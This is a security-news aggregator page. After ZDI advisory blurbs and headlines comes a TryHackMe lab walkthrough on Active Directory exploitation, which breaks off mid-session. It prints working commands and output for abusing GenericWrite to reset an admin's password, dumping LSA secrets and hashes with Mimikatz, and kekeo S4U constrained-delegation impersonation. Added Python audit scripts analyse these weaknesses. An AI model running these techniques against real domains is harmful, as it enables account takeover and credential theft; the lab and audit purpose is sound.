This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11422.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of libarchive. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-26256.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of XWiki.org XWiki. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of libarchive. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-20697.

by Zero Day Initiative Advisories

Stay alert to crypto scams with our guide to 2024’s top threats, including phishing, malware, Ponzi schemes, and…

by Hackread

An IT pro seeks guidance on hardening Windows systems after overcoming a ransomware attack.

by ITPro Today

Russia-linked APT29 group uses malicious RDP configuration files, adapting red teaming methods for cyberattacks to compromise systems. In October 2024, the Russia-linked cyber espionage group APT29 (aka Earth Koshchei, SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) used rogue RDP attacks via phishing emails targeting governments, think tanks, and Ukrainian entities to steal data and install malware. The […]

by Security Affairs

Learn about the latest trend in ransomware attacks known as double extortion. Discover how Darktrace can help protect your organization from this threat.

by Darktrace

The agency asks the cybersecurity community to adopt "romance baiting" in place of dehumanizing language.

by Dark Reading

This year’s top AI stories highlight developments among industry giants, a breadth of security vulnerabilities, and new use cases.

by ITPro Today

The National Defense Authorization Act passed today, but lawmakers stripped language that would keep the Trump administration from wielding unprecedented authority to surveil Americans.

by WIRED Security News

TP-Link products have been connected to several high-profile hacking incidents. (Also, they're made in China.)

by ZDNET Security

The threat intelligence business, which is set to be acquired by Mastercard for billions, is officially vendor non grata in Putin's regime.

by Dark Reading

Researchers warn that threat actors are attempting to exploit a recently disclosed Apache Struts vulnerability CVE-2024-53677. Researchers warn that threat actors are attempting to exploit the vulnerability CVE-2024-53677 (CVSS score of 9.5) in Apache Struts. A remote attacker could exploit this vulnerability to upload malicious files, potentially leading to arbitrary code execution. “An attacker can […]

by Security Affairs

Over the past few months, enterprises have observed a pattern of sophisticated spearphishing attempts targeting their executives, with some specifically targeting their mobile devices. Our blog shares the details. The post Mobile Spear Phishing Targets Executive Teams appeared first on Zimperium.

by Zimperium

A security researcher found customer names and workplace affiliations spilling directly from Hapn's servers.

by TechCrunch

KEY SUMMARY POINTS The FBI has issued a Private Industry Notification (PIN) to highlight new malware campaigns targeting…

by Hackread

Cybersecurity researchers have disclosed a new phishing campaign that has targeted European companies with an aim to harvest account credentials and take control of the victims' Microsoft Azure cloud infrastructure. The campaign has been codenamed HubPhish by Palo Alto Networks Unit 42 owing to the abuse of HubSpot tools in the attack chain. Targets include at least 20,000 automotive, chemical,

by The Hacker News

Threat actors are attempting to exploit a recently disclosed security flaw impacting Apache Struts that could pave the way for remote code execution. The issue, tracked as CVE-2024-53677, carries a CVSS score of 9.5 out of 10.0, indicating critical severity. The vulnerability shares similarities with another critical bug the project maintainers addressed in December 2023 (CVE-2023-50164, CVSS

by The Hacker News

Exploiting Permission Delegation

Permission Delegation is a feature in AD that allows administrators to give specific permissions to certain users or teams. In our case, DOMAIN_USERS has GenericWrite permission on the IT Support group.

GenericWrite: We can update any non-protected parameters of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.

Subsequently, the IT Support team is given permission to reset passwords for all users. This includes Domain Admins, which is insecure.

Let's exploit:

PS C:\Users\colin.lane> Add-ADGroupMember "IT Support" -Members "colin.lane"
PS C:\Users\colin.lane> Get-ADGroupMember -Identity "IT Support"

distinguishedName : CN=colin.lane,OU=Human Resources,OU=People,DC=za,DC=tryhackme,DC=loc
name              : colin.lane
objectClass       : user
objectGUID        : cb777a93-fadd-464f-b588-4c69f4bb0444
SamAccountName    : colin.lane
SID               : S-1-5-21-3885271727-2693558621-2658995185-1132

PS C:\Users\colin.lane> Get-ADGroupMember -Identity "Tier 2 Admins"

distinguishedName : CN=t2_lawrence.lewis,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc
name              : t2_lawrence.lewis
objectClass       : user
objectGUID        : 4ca61b47-93c8-44d2-987d-eca30c69d828
SamAccountName    : t2_lawrence.lewis
SID               : S-1-5-21-3885271727-2693558621-2658995185-1893

distinguishedName : CN=t2_leon.francis,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc
name              : t2_leon.francis
objectClass       : user
objectGUID        : 854b6d40-d537-4986-b586-c40950e0d5f9
SamAccountName    : t2_leon.francis
SID               : S-1-5-21-3885271727-2693558621-2658995185-3660

distinguishedName : CN=t2_henry.harvey,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc
name              : t2_henry.harvey
objectClass       : user
objectGUID        : a3c2db31-6362-4af7-8a3e-20e0c16a664f
SamAccountName    : t2_henry.harvey
SID               : S-1-5-21-3885271727-2693558621-2658995185-4275

PS C:\Users\colin.lane> $Password = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\Users\colin.lane> Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword $Password
Set-ADAccountPassword : Access is denied
At line:1 char:1
+ Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (t2_henry.harvey:ADAccount) [Set-ADAccountPassword], UnauthorizedAccessException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Management.Commands.SetADAccountPassword

PS C:\Users\colin.lane> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

It will take around 10 to 15 minutes for the new group membership to apply.

PS C:\Users\colin.lane> $Password = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\Users\colin.lane> Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword $Password
Set-ADAccountPassword : Access is denied
At line:1 char:1
+ Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (t2_henry.harvey:ADAccount) [Set-ADAccountPassword], UnauthorizedAccessException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Management.Commands.SetADAccountPassword

PS C:\Users\colin.lane> Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword $Password
Set-ADAccountPassword : Access is denied

PS C:\Users\colin.lane> Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword $Password
PS C:\Users\colin.lane>

It takes some time for the change to take effect. Once the reset succeeds, we can log in as t2_henry.harvey:

┌──(kali㉿kali)-[~/Documents/explotingad]
└─$ ssh za.tryhackme.loc\\t2_henry.harvey@thmwrk1.za.tryhackme.loc
za.tryhackme.loc\t2_henry.harvey@thmwrk1.za.tryhackme.loc's password:
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\t2_henry.harvey@THMWRK1 C:\Users\t2_henry.harvey>cd ..
za\t2_henry.harvey@THMWRK1 C:\Users>cd Administrator
za\t2_henry.harvey@THMWRK1 C:\Users\Administrator>cd Desktop
za\t2_henry.harvey@THMWRK1 C:\Users\Administrator\Desktop>dir
 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\Administrator\Desktop

06/16/2022  05:09 PM    <DIR>          .
06/16/2022  05:09 PM    <DIR>          ..
04/30/2022  10:53 AM                31 flag1.txt
               1 File(s)             31 bytes
               2 Dir(s)  50,251,628,544 bytes free

za\t2_henry.harvey@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt
THM{Permission.Delegation.FTW!}

Exploiting Kerberos Delegation

What is Kerberos Delegation?

Kerberos Delegation allows one service (like a web server) to access another service (like a database) on behalf of a user. Instead of giving the web server full access, it uses the user's permissions to retrieve data. Here is a clear and simple explanation for all types of Kerberos Delegation:

Unconstrained Delegation
This is the least secure type of delegation. It allows a service to access any other service on behalf of a user without restrictions. The user's Kerberos Ticket-Granting Ticket (TGT) is stored in memory. If an attacker compromises the service, they can steal the TGT and impersonate the user to access other services.

Constrained Delegation
This is more secure because it limits which specific services a service account can access on behalf of users. Example services include web apps (HTTP), file shares (CIFS), LDAP for user management, and databases (MSSQL). If an attacker compromises an account, they can only access the specific services configured for delegation.

Resource-Based Constrained Delegation (RBCD)
RBCD gives more control to the target service. In RBCD, instead of saying, “The web server can act on behalf of users to access the database server,” the database server itself specifies which accounts (e.g., the web server) are allowed to act on behalf of users. This is done by using an attribute called msDS-AllowedToActOnBehalfOfOtherIdentity. If an attacker has permission to configure RBCD, they can allow their own account to act on behalf of others and gain unauthorized access to the service.
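An added example, not code from the TryHackMe room or from the writeup, that audits a constructed AD snapshot for both weaknesses just described. takeover_path() searches group membership and ACEs for the chain used in the Permission Delegation section (colin.lane -> IT Support -> t2_henry.harvey); classify_delegation() maps userAccountControl and the msDS-* attributes onto the delegation types above, and can_impersonate() checks whether a constrained account may obtain a ticket as a given user for a given SPN. The svcIIS record copies the attributes the writeup shows for that account; the other accounts, the RBCD entry, the record layout and the BloodHound-style mapping of rights to takeover edges are assumptions.

```python
"""Audit a constructed AD snapshot for abusable ACE paths and for Kerberos
delegation settings. Added example, not code from the TryHackMe room; all
accounts except svcIIS, and the record layout, are assumptions."""
from collections import deque

# userAccountControl bits (ADS_USER_FLAG_ENUM).
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Rights that hand the trustee control of the target (assumed mapping, as BloodHound does it):
# on a group they allow adding a member, on a user they allow a password reset.
GROUP_TAKEOVER = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "AddMember"}
USER_TAKEOVER = {"GenericAll", "ForceChangePassword", "WriteDacl", "WriteOwner"}

# Constructed objects and ACEs (trustee, right, target) mirroring the writeup.
OBJECTS = {
    "colin.lane": {"type": "user", "member_of": ["DOMAIN_USERS"]},
    "DOMAIN_USERS": {"type": "group", "member_of": []},
    "IT Support": {"type": "group", "member_of": []},
    "Tier 2 Admins": {"type": "group", "member_of": []},
    "t2_henry.harvey": {"type": "user", "member_of": ["Tier 2 Admins"]},
}
ACES = [
    ("DOMAIN_USERS", "GenericWrite", "IT Support"),            # GenericWrite on the group
    ("IT Support", "ForceChangePassword", "t2_henry.harvey"),  # "reset passwords for all users"
]


def takeover_path(start, target, objects=OBJECTS, aces=ACES):
    """Shortest chain of MemberOf / abusable-ACE edges from start to target, or None."""
    edges = {}
    for name, obj in objects.items():
        for group in obj["member_of"]:
            edges.setdefault(name, []).append(("MemberOf", group))
    for trustee, right, tgt in aces:
        allowed = GROUP_TAKEOVER if objects[tgt]["type"] == "group" else USER_TAKEOVER
        if right in allowed:
            edges.setdefault(trustee, []).append((right, tgt))
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for edge, nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, edge, nxt)]))
    return None


# svcIIS matches the writeup's attributes; every other account is invented.
ACCOUNTS = {
    "svcIIS": {"uac": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | TRUSTED_TO_AUTH_FOR_DELEGATION,
               "allowed_to_delegate_to": ["WSMAN/THMSERVER1.za.tryhackme.loc", "WSMAN/THMSERVER1",
                                          "http/THMSERVER1.za.tryhackme.loc", "http/THMSERVER1"],
               "allowed_to_act": []},
    "THMWRK1$": {"uac": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
                 "allowed_to_delegate_to": [], "allowed_to_act": []},
    "THMSERVER2$": {"uac": WORKSTATION_TRUST_ACCOUNT, "allowed_to_delegate_to": [],
                    "allowed_to_act": ["svcIIS"]},  # msDS-AllowedToActOnBehalfOfOtherIdentity
    "t1_trevor.jones": {"uac": NORMAL_ACCOUNT, "allowed_to_delegate_to": [], "allowed_to_act": []},
    "t0_admin": {"uac": NORMAL_ACCOUNT | NOT_DELEGATED, "allowed_to_delegate_to": [], "allowed_to_act": []},
}


def classify_delegation(acct):
    """Map an account's attributes onto the delegation types described above."""
    uac = acct["uac"]
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct["allowed_to_delegate_to"]:
        return "constrained+protocol-transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained"
    if acct["allowed_to_act"]:
        return "rbcd-target"
    return "none"


def can_impersonate(service, user, spn, accounts=ACCOUNTS):
    """Can `service` get a ticket as `user` for `spn` with S4U2Self + S4U2Proxy?
    Needs protocol transition (without it S4U2Self returns a non-forwardable
    ticket), the SPN in msDS-AllowedToDelegateTo (compared case-insensitively),
    and a user that is not flagged NOT_DELEGATED."""
    svc = accounts[service]
    if classify_delegation(svc) != "constrained+protocol-transition":
        return False
    if spn.lower() not in {s.lower() for s in svc["allowed_to_delegate_to"]}:
        return False
    return not (accounts[user]["uac"] & NOT_DELEGATED)


if __name__ == "__main__":
    for hop in takeover_path("colin.lane", "t2_henry.harvey") or []:
        print(" -> ".join(hop))
    for name, acct in ACCOUNTS.items():
        print(f"{name:16} {classify_delegation(acct)}")
    print(can_impersonate("svcIIS", "t1_trevor.jones", "http/THMSERVER1.za.tryhackme.loc"))
```

The same search finds the longer chain to Tier 2 Admins through t2_henry.harvey's membership, which is why the writeup's password reset ends up as a Tier 2 login rather than just one user. On the delegation side, the NOT_DELEGATED flag (and, in real domains, the Protected Users group, which this snapshot does not model) is the cheap defensive control: marking tier-0 accounts sensitive makes the S4U2Self step yield nothing an S4U2Proxy request can use.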
Let's exploit Constrained Delegation

Using PowerView, enumerate accounts that are trusted to authenticate for delegation (the TRUSTED_TO_AUTH_FOR_DELEGATION bit in userAccountControl):

```
PS C:\Users\t2_henry.harvey> import-module C:\Tools\PowerView.ps1
PS C:\Users\t2_henry.harvey> Get-NetUser -TrustedToAuth

logoncount               : 65
badpasswordtime          : 12/17/2024 8:59:08 AM
distinguishedname        : CN=IIS Server,CN=Users,DC=za,DC=tryhackme,DC=loc
objectclass              : {top, person, organizationalPerson, user}
displayname              : IIS Server
lastlogontimestamp       : 12/8/2024 5:07:23 PM
userprincipalname        : svcIIS@za.tryhackme.loc
name                     : IIS Server
objectsid                : S-1-5-21-3885271727-2693558621-2658995185-6155
samaccountname           : svcIIS
codepage                 : 0
samaccounttype           : USER_OBJECT
accountexpires           : NEVER
countrycode              : 0
whenchanged              : 12/8/2024 5:07:23 PM
instancetype             : 4
usncreated               : 78494
objectguid               : 11e42287-0a25-4d73-800d-b62e2d2a2a4b
sn                       : Server
lastlogoff               : 1/1/1601 12:00:00 AM
msds-allowedtodelegateto : {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc, http/THMSERVER1}
objectcategory           : CN=Person,CN=Schema,CN=Configuration,DC=tryhackme,DC=loc
dscorepropagationdata    : 1/1/1601 12:00:00 AM
serviceprincipalname     : HTTP/svcServWeb.za.tryhackme.loc
givenname                : IIS
lastlogon                : 12/17/2024 9:08:01 AM
badpwdcount              : 0
cn                       : IIS Server
useraccountcontrol       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
whencreated              : 4/27/2022 11:26:21 AM
primarygroupid           : 513
pwdlastset               : 4/29/2022 11:50:25 AM
usnchanged               : 172089
```

Note: Constrained Delegation means an account may only delegate to the specific services listed in its msds-allowedtodelegateto attribute. Here svcIIS can delegate to the HTTP and WSMAN services on THMSERVER1:

msds-allowedtodelegateto: {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc, http/THMSERVER1}

Note: Unconstrained Delegation allows the account to delegate to any service in the domain. It is configured through the "Trust this computer for delegation to any service (Kerberos only)" setting in Active Directory Users and Computers, and such accounts have no service restrictions listed in msds-allowedtodelegateto.

On THMWRK1 a service (thmwinauth) runs as svcIIS. Windows stores service account passwords as LSA secrets in the SECURITY registry hive, so with local administrator rights on the host we can dump them with Mimikatz:

```
PS C:\Tools\mimikatz_trunk\x64> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

492     {0;000003e7} 1 D 17718          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;001004ea} 0 D 1499133     ZA\t2_henry.harvey      S-1-5-21-3885271727-2693558621-2658995185-4275  (12g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1517750     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942

Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 )
Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 )
Domain FQDN : za.tryhackme.loc

Policy subsystem is : 1.18
LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27}
  [00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a95c2af4463

Secret  : $MACHINE.ACC
cur/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs `&suI rmg,g GQsb%),mlWLo?6$kqP
    NTLM:4207d1b7e4b942da2371174b772fdf5e
    SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db
old/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs `&suI rmg,g GQsb%),mlWLo?6$kqP
    NTLM:4207d1b7e4b942da2371174b772fdf5e
    SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db

Secret  : DefaultPassword
old/text: vagrant

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 5e 3f 03 8d 79 49 90 e7 2e e0
    full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
    m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 02 0b c1 5b 24 f4 44 d0 74 31
    full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431
    m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431

Secret  : NL$KM
cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 5 8
old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 5 8

Secret  : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@

mimikatz # token::revert
 * Process Token : {0;001004ea} 0 D 1499133     ZA\t2_henry.harvey      S-1-5-21-3885271727-2693558621-2658995185-4275  (12g,24p)       Primary
 * Thread Token  : no token
```

* token::elevate - impersonate SYSTEM; the LSA secrets in the registry hive are only readable as SYSTEM (this needs local administrator rights on the host).
* lsadump::secrets - read the LSA secrets from the hive; credentials of services run under a domain account are stored there as _SC_<service name>, in clear text.
* token::revert - drop the SYSTEM impersonation and return to the original user context.

The interesting entry is:

Secret  : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@

With the password of the svcIIS account in hand, we can perform the Kerberos delegation attack.
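Before moving on to the S4U attack, here is an added example of my own (it is not from the write-up, the TryHackMe room or PowerView) that encodes the two notes above: it decodes the userAccountControl string PowerView prints, classifies an account's delegation model, and lists the SPNs an attacker holding that account's credentials could obtain tickets for on behalf of another user. The svcIIS record is taken from the Get-NetUser output above; the other two accounts are constructed for illustration.

```python
from dataclasses import dataclass, field

# userAccountControl bits (MS-ADTS 2.2.16) that matter for delegation, plus the
# flags PowerView printed for svcIIS so its string form can be decoded.
UAC_BITS = {
    "NORMAL_ACCOUNT": 0x00000200,
    "WORKSTATION_TRUST_ACCOUNT": 0x00001000,
    "SERVER_TRUST_ACCOUNT": 0x00002000,
    "DONT_EXPIRE_PASSWORD": 0x00010000,
    "TRUSTED_FOR_DELEGATION": 0x00080000,          # unconstrained delegation
    "NOT_DELEGATED": 0x00100000,                   # "account is sensitive and cannot be delegated"
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x01000000,  # constrained delegation with protocol transition
}


def uac_from_names(text):
    """Turn PowerView's 'NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, ...' into the integer bitmask."""
    value = 0
    for name in (n.strip() for n in text.split(",") if n.strip()):
        value |= UAC_BITS[name]  # an unknown flag name raises KeyError on purpose
    return value


@dataclass
class AdAccount:
    sam: str
    uac: int
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo


def classify_delegation(acct):
    """Map an account's attributes to its delegation model."""
    if acct.uac & UAC_BITS["TRUSTED_FOR_DELEGATION"]:
        return "unconstrained"                        # any service; attacker needs a victim's TGT
    if acct.allowed_to_delegate_to:
        if acct.uac & UAC_BITS["TRUSTED_TO_AUTH_FOR_DELEGATION"]:
            return "constrained-protocol-transition"  # S4U2Self + S4U2Proxy, no victim interaction
        return "constrained-kerberos-only"            # needs a forwardable TGS from the victim
    return "none"


def s4u_targets(acct, victim_uac, victim_in_protected_users=False):
    """SPNs for which `acct` can mint a ticket as an arbitrary user via S4U2Self/S4U2Proxy.

    Empty when the attack cannot work: the account lacks protocol transition, or the
    victim is marked NOT_DELEGATED / is in Protected Users (the KDC then refuses to
    issue a forwardable S4U2Self ticket, so S4U2Proxy fails).
    """
    if victim_uac & UAC_BITS["NOT_DELEGATED"] or victim_in_protected_users:
        return []
    if classify_delegation(acct) != "constrained-protocol-transition":
        return []
    return sorted({spn.lower() for spn in acct.allowed_to_delegate_to})


# The svcIIS object exactly as printed by Get-NetUser -TrustedToAuth above.
SVC_IIS = AdAccount(
    "svcIIS",
    uac_from_names("NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION"),
    ["WSMAN/THMSERVER1.za.tryhackme.loc", "WSMAN/THMSERVER1",
     "http/THMSERVER1.za.tryhackme.loc", "http/THMSERVER1"],
)

# Constructed for illustration; these are not accounts from the lab.
UNCONSTRAINED_HOST = AdAccount(
    "FILESRV$", UAC_BITS["WORKSTATION_TRUST_ACCOUNT"] | UAC_BITS["TRUSTED_FOR_DELEGATION"])
KERBEROS_ONLY = AdAccount(
    "svcSQL", UAC_BITS["NORMAL_ACCOUNT"], ["MSSQLSvc/db01.za.tryhackme.loc:1433"])

if __name__ == "__main__":
    for acct in (SVC_IIS, UNCONSTRAINED_HOST, KERBEROS_ONLY):
        print(f"{acct.sam:10} {classify_delegation(acct):32} "
              f"S4U targets: {s4u_targets(acct, UAC_BITS['NORMAL_ACCOUNT'])}")
```

Two practitioner notes on what the classification implies: only the protocol-transition variant lets you impersonate a user who never authenticated to the service account, which is why the kekeo flow below works with nothing but svcIIS's password; and because the KDC validates the host in the S4U2Proxy request but the service class of the resulting ticket is not protected, an entry such as http/THMSERVER1 in practice grants any service on that host (Rubeus's /altservice option exploits this), so defenders should treat each listed host, not each SPN, as the unit of exposure.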
Kekeo

First, we request a Ticket Granting Ticket (TGT) for the svcIIS service account in the za.tryhackme.loc domain using the recovered password. Then we leverage S4U2Self and S4U2Proxy to:

* Impersonate the user t1_trevor.jones. S4U2Self: svcIIS asks the KDC for a forwardable service ticket to itself on behalf of t1_trevor.jones, which the KDC allows because the account has TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition). The victim never has to authenticate to us.
* Request service tickets for the HTTP and WSMAN services on THMSERVER1. S4U2Proxy: the forwardable ticket is exchanged for a ticket to a service listed in msds-allowedtodelegateto.

Caveat: this only works against users who are not marked "Account is sensitive and cannot be delegated" and are not members of Protected Users; for those the KDC will not issue a forwardable S4U2Self ticket.

The S4U requests used to generate the service tickets:

HTTP service ticket:
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

WSMAN service ticket:
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

```
PS C:\Users\t2_henry.harvey> C:\Tools\kekeo\x64\kekeo.exe

  ___ _   kekeo 2.1 (x64) built on Dec 14 2021 11:51:55
 /   ('>- "A La Vie, A L'Amour"
 | K  |   /* * *
 \____/   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_     https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
Realm        : za.tryhackme.loc (za)
User         : svcIIS (svcIIS)
CName        : svcIIS  [KRB_NT_PRINCIPAL (1)]
SName        : krbtgt/za.tryhackme.loc  [KRB_NT_SRV_INST (2)]
Need PAC     : Yes
Auth mode    : ENCRYPTION KEY 23 (rc4_hmac_nt      ): 43460d636f269c709b20049cee36ae7a
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2024 9:08:01 AM ; 12/17/2024 7:08:01 PM] {R:12/24/2024 9:08:01 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): 634f4c25dc505bcc53ee5f85790b5b1a71f30bc3775af70e49751835ed2b8f9e
[s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
[s4u2proxy] http/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
